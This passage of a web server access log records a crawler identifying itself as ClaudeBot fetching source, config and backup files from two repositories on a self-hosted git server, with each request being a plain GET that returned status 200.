+claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" [Client 216.73.216.188] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13156] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15576] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css" [Client 216.73.216.188] [Length 10107] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14826] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15557] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html?display=source" [Client 216.73.216.188] [Length 21826] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" [Client 216.73.216.188] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json?display=source" [Client 216.73.216.188] [Length 11092] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11319] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11901] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13897] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 14688] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" [Client 216.73.216.188] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services" [Client 216.73.216.188] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10912] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md?display=source" [Client 216.73.216.188] [Length 11792] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16506] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14234] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 13956] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fcomponents%2FChatBot.tsx" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 9970] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" [Client 216.73.216.188] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" [Client 216.73.216.188] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fcomponents%2FHeader.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11359] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11978] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:36 